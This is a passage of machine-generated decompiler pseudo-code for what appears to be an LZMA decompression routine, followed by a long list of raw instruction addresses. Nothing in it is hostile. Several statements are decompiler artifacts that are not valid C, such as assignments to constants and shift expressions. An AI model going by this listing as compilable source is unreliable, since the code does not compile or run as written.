													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                                                              0x00000000
                                                              0x00406ce2
                                                              0x00406ce2
                                                              0x00406ce6
                                                              0x00406cf3
                                                              0x00406cfd
                                                              0x00000000
                                                              0x00406ce8
                                                              0x00406ce8
                                                              0x00406d23
                                                              0x00406d26
                                                              0x00406d29
                                                              0x00406d2c
                                                              0x00406d2c
                                                              0x00406d2f
                                                              0x00406d36
                                                              0x00406d3b
                                                              0x00406c1c
                                                              0x00406c1f
                                                              0x00406f91
                                                              0x00406f91
                                                              0x00406f91
                                                              0x00406f94
                                                              0x00406f94
                                                              0x00406f94
                                                              0x00406f9a
                                                              0x00406fa0
                                                              0x00406fa6
                                                              0x00406fc0
                                                              0x00406fc3
                                                              0x00406fc9
                                                              0x00406fd4
                                                              0x00406fd6
                                                              0x00406fa8
                                                              0x00406fa8
                                                              0x00406fb7
                                                              0x00406fbb
                                                              0x00406fbb
                                                              0x00406fe0
                                                              0x00000000
                                                              0x00000000
                                                              0x00406fe2
                                                              0x00406fe6
                                                              0x00407195
                                                              0x004071ab
                                                              0x004071b3
                                                              0x004071ba
                                                              0x004071bc
                                                              0x004071c3
                                                              0x004071c7
                                                              0x004071c7
                                                              0x00406ff2
                                                              0x00406ff9
                                                              0x00407001
                                                              0x00407004
                                                              0x00407007
                                                              0x00407007
                                                              0x0040700d
                                                              0x0040700d
                                                              0x004067a9
                                                              0x004067a9
                                                              0x004067a9
                                                              0x004067b2
                                                              0x00000000
                                                              0x00000000
                                                              0x004067b8
                                                              0x00000000
                                                              0x004067c3
                                                              0x00000000
                                                              0x00000000
                                                              0x004067cc
                                                              0x004067cf
                                                              0x004067d2
                                                              0x004067d6
                                                              0x00000000
                                                              0x00000000
                                                              0x004067dc
                                                              0x004067df
                                                              0x004067e1
                                                              0x004067e2
                                                              0x004067e5
                                                              0x004067e7
                                                              0x004067e8
                                                              0x004067ea
                                                              0x004067ed
                                                              0x004067f2
                                                              0x004067f7
                                                              0x00406800
                                                              0x00406813
                                                              0x00406816
                                                              0x00406822
                                                              0x0040684a
                                                              0x0040684c
                                                              0x0040685a
                                                              0x0040685a
                                                              0x0040685e
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040684e
                                                              0x0040684e
                                                              0x00406851
                                                              0x00406852
                                                              0x00406852
                                                              0x00000000
                                                              0x0040684e
                                                              0x00406828
                                                              0x0040682d
                                                              0x0040682d
                                                              0x00406836
                                                              0x0040683e
                                                              0x00406841
                                                              0x00000000
                                                              0x00406847
                                                              0x00406847
                                                              0x00000000
                                                              0x00406847
                                                              0x00000000
                                                              0x00406864
                                                              0x00406864
                                                              0x00406868
                                                              0x00407114
                                                              0x00000000
                                                              0x00407114
                                                              0x00406871
                                                              0x00406881
                                                              0x00406884
                                                              0x00406887
                                                              0x00406887
                                                              0x00406887
                                                              0x0040688a
                                                              0x0040688e
                                                              0x00000000
                                                              0x00000000
                                                              0x00406890
                                                              0x00406896
                                                              0x004068c0
                                                              0x004068c6
                                                              0x004068cd
                                                              0x00000000
                                                              0x004068cd
                                                              0x0040689c
                                                              0x0040689f
                                                              0x004068a4
                                                              0x004068a4
                                                              0x004068af
                                                              0x004068b7
                                                              0x004068ba
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004068ff
                                                              0x00406905
                                                              0x00406908
                                                              0x00406915
                                                              0x0040691d
                                                              0x00406f91
                                                              0x00406f91
                                                              0x00000000
                                                              0x00000000
                                                              0x004068d4
                                                              0x004068d4
                                                              0x004068d8
                                                              0x00407123
                                                              0x00000000
                                                              0x00407123
                                                              0x004068e4
                                                              0x004068ef
                                                              0x004068ef
                                                              0x004068ef
                                                              0x004068f2
                                                              0x004068f5
                                                              0x004068f8
                                                              0x004068fd
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f94
                                                              0x00406f94
                                                              0x00406f9a
                                                              0x00406fa0
                                                              0x00406fa6
                                                              0x00406fc0
                                                              0x00406fc3
                                                              0x00406fc9
                                                              0x00406fd4
                                                              0x00406fd6
                                                              0x00406fa8
                                                              0x00406fa8
                                                              0x00406fb7
                                                              0x00406fbb
                                                              0x00406fbb
                                                              0x00406fe0
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406925
                                                              0x00406927
                                                              0x0040692a
                                                              0x0040699b
                                                              0x0040699e
                                                              0x004069a1
                                                              0x004069a8
                                                              0x004069b2
                                                              0x00406f91
                                                              0x00406f91
                                                              0x00406f91
                                                              0x00000000
                                                              0x00406f91
                                                              0x00406f91
                                                              0x0040692c
                                                              0x00406930
                                                              0x00406933
                                                              0x00406935
                                                              0x00406938
                                                              0x0040693b
                                                              0x0040693d
                                                              0x00406940
                                                              0x00406942
                                                              0x00406947
                                                              0x0040694a
                                                              0x0040694d
                                                              0x00406951
                                                              0x00406958
                                                              0x0040695b
                                                              0x00406962
                                                              0x00406966
                                                              0x0040696e
                                                              0x0040696e
                                                              0x0040696e
                                                              0x00406968
                                                              0x00406968
                                                              0x00406968
                                                              0x0040695d
                                                              0x0040695d
                                                              0x0040695d
                                                              0x00406972
                                                              0x00406975
                                                              0x00406993
                                                              0x00406995
                                                              0x00000000
                                                              0x00406977
                                                              0x00406977
                                                              0x0040697a
                                                              0x0040697d
                                                              0x00406980
                                                              0x00406982
                                                              0x00406982
                                                              0x00406982
                                                              0x00406985
                                                              0x00406988
                                                              0x0040698a
                                                              0x0040698b
                                                              0x0040698e
                                                              0x00000000
                                                              0x0040698e
                                                              0x00000000
                                                              0x00406bc4
                                                              0x00406bc8
                                                              0x00406be6
                                                              0x00406be9
                                                              0x00406bf0
                                                              0x00406bf3
                                                              0x00406bf6
                                                              0x00406bf9
                                                              0x00406bfc
                                                              0x00406bff
                                                              0x00406c01
                                                              0x00406c08
                                                              0x00406c09
                                                              0x00406c0b
                                                              0x00406c0e
                                                              0x00406c11
                                                              0x00406c14
                                                              0x00406c14
                                                              0x00406c19
                                                              0x00000000
                                                              0x00406c19
                                                              0x00406bca
                                                              0x00406bcd
                                                              0x00406bd0
                                                              0x00406bda
                                                              0x00406f91
                                                              0x00406f91
                                                              0x00406f91
                                                              0x00000000
                                                              0x00406f91
                                                              0x00000000
                                                              0x00406c2e
                                                              0x00406c32
                                                              0x00406c55
                                                              0x00406c58
                                                              0x00406c5b
                                                              0x00406c65
                                                              0x00406c34
                                                              0x00406c34
                                                              0x00406c37
                                                              0x00406c3a
                                                              0x00406c3d
                                                              0x00406c4a
                                                              0x00406c4d
                                                              0x00406c4d
                                                              0x00406f91
                                                              0x00406f91
                                                              0x00406f91
                                                              0x00000000
                                                              0x00406f91
                                                              0x00000000
                                                              0x00406c71
                                                              0x00406c75
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c7b
                                                              0x00406c7f
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c85
                                                              0x00406c87
                                                              0x00406c8b
                                                              0x00406c8b
                                                              0x00406c8e
                                                              0x00406c92
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d09
                                                              0x00406d0d
                                                              0x00406d14
                                                              0x00406d17
                                                              0x00406d1a
                                                              0x00406d0f
                                                              0x00406d0f
                                                              0x00406d0f
                                                              0x00406d1d
                                                              0x00406d20
                                                              0x00000000
                                                              0x00000000
                                                              0x00406dc9
                                                              0x00406dc9
                                                              0x00406dcd
                                                              0x0040716b
                                                              0x00000000
                                                              0x0040716b
                                                              0x00406dd3
                                                              0x00406dd6
                                                              0x00406dd9
                                                              0x00406ddd
                                                              0x00406de0
                                                              0x00406de6
                                                              0x00406de8
                                                              0x00406de8
                                                              0x00406de8
                                                              0x00406deb
                                                              0x00406dee
                                                              0x00000000
                                                              0x00000000
                                                              0x004069be
                                                              0x004069be
                                                              0x004069c2
                                                              0x0040712f
                                                              0x00000000
                                                              0x0040712f
                                                              0x004069c8
                                                              0x004069cb
                                                              0x004069ce
                                                              0x004069d2
                                                              0x004069d5
                                                              0x004069db
